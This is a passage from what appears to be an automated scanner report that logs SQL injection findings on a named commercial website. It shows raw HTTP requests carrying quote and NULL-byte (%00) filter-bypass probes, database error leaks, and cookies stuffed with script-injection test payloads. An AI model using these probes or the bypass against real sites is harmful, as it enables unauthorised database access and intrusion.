Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:28:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mg5ci472e6811aqpktiajvlri5; path=/
Content-Length: 2494
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
adflow/cace00/project_dynamic_page_updated.php?catId=80007.'&group=cace00&template=3' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php?catId=80007.'&group=cace00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group=cace00&template=3' OR prj.project_page_url = 'leadflow/cace00/project_dyna' at line 5

Request 2

GET /ppc/leadflow/cace00/project_dynamic_page_updated.php?catId=80007%00''&group=cace00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:28:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9kjjoc952qpjmsn9lasimu7bs2; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project_dynamic_page_updated.php was not found on this server.</p>

1.205. http://www.insideup.com/ppc/leadflow/cace00/project_dynamic_page_updated.php [group parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project_dynamic_page_updated.php

Issue detail

The group parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the group parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

POST /ppc/leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00%00'&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 482

subcategoryId=80007&catId=80007&iusrc=iupsc+&attributeId_393[]=1937__Other&attributeId_508[]=3317__+Other&attributeId_394=1945__20%2c000%2b&attributeId_395=1950__More+than+two+months&attributeId_396=1
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:30:43 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=8dpb1578hfkifpk1t6fceoqv23; path=/
Content-Length: 2494
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
adflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00.'&template=3' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00.'&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php?ca' at line 5

Request 2

POST /ppc/leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00%00''&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 482

subcategoryId=80007&catId=80007&iusrc=iupsc+&attributeId_393[]=1937__Other&attributeId_508[]=3317__+Other&attributeId_394=1945__20%2c000%2b&attributeId_395=1950__More+than+two+months&attributeId_396=1
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:30:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=sj705dd0stj2iid950l12u4kp6; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.206. http://www.insideup.com/ppc/leadflow/cace00/project_dynamic_page_updated.php [group parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project_dynamic_page_updated.php

Issue detail

The group parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the group parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00'&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:28:57 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=c640mb3pp7db43u6t02qb0v3a3; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00'&template=3' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00'&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php?ca' at line 5

Request 2

GET /ppc/leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00''&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
